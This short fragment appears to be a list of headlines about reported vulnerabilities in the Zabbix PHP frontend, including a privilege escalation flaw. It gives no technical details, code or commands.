Zabbix Privilege Escalation Vulnerability
Some vulnerabilities have been reported in the ZABBIX PHP frontend
Multiple Vulnerabilities in Zabbix Frontend
Zabbix, the culprit.